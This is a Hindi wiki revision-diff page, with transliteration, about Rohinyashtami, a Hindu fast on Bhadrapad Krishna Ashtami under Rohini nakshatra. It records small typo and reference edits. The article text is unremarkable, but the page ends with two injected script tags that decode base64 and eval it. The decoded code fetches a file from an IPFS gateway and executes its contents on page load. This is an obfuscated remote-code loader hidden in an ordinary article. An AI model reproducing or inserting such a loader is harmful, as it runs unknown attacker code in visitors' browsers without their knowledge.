Difference between revisions of "रोहिण्या अष्टमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भाद्रपद]] [[कृष्ण पक्ष]] की [[अष्टमी]] को, जब वह [[रोहिणी]] [[नक्षत्र]] से युक्त होती है, रोहिण्याष्टमी जयन्ती कहा जाता है।
 
*[[भाद्रपद]] [[कृष्ण पक्ष]] की [[अष्टमी]] को, जब वह [[रोहिणी]] [[नक्षत्र]] से युक्त होती है, रोहिण्याष्टमी जयन्ती कहा जाता है।
 
*जब [[अष्टमी]] अर्धरात्रि के पूर्व एवं उपरान्त एक [[कला]] तक बढ़ी रहती है तो वह अत्यन्त पवित्र काल माना जाता है और उसी समय भगवान [[हरि]] का जन्म हुआ था।
 
*जब [[अष्टमी]] अर्धरात्रि के पूर्व एवं उपरान्त एक [[कला]] तक बढ़ी रहती है तो वह अत्यन्त पवित्र काल माना जाता है और उसी समय भगवान [[हरि]] का जन्म हुआ था।
 
*इस जयन्ती पर उपवास एवं हरि पूजा से कर्ता के एक सौ पूर्व जीवनों पाप कट जाते हैं।
 
*इस जयन्ती पर उपवास एवं हरि पूजा से कर्ता के एक सौ पूर्व जीवनों पाप कट जाते हैं।
*यह रोहिणीव्रत एक सौ [[एकादशी]] व्रतों से उत्तम है।<ref>राजमार्तण्ड (1231-1255); कृत्यरत्नाकर (258); वर्षक्रियाकौमुदी (298-304)</ref>
+
*यह रोहिणीव्रत एक सौ [[एकादशी]] व्रतों से उत्तम है।<ref>राजमार्तण्ड (1231-1255); कृत्यरत्नाकर (258); वर्षक्रियाकौमुदी (298-304</ref>
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:59, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad krishna paksh ki ashtami ko, jab vah rohini nakshatr se yukt hoti hai, rohinyashtami jayanti kaha jata hai.
  • jab ashtami ardharatri ke poorv evan uparant ek kala tak badhi rahati hai to vah atyant pavitr kal mana jata hai aur usi samay bhagavan hari ka janm hua tha.
  • is jayanti par upavas evan hari pooja se karta ke ek sau poorv jivanoan pap kat jate haian.
  • yah rohinivrat ek sau ekadashi vratoan se uttam hai.[1]

tika tippani aur sandarbh

  1. rajamartand (1231-1255); krityaratnakar (258); varshakriyakaumudi (298-304

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>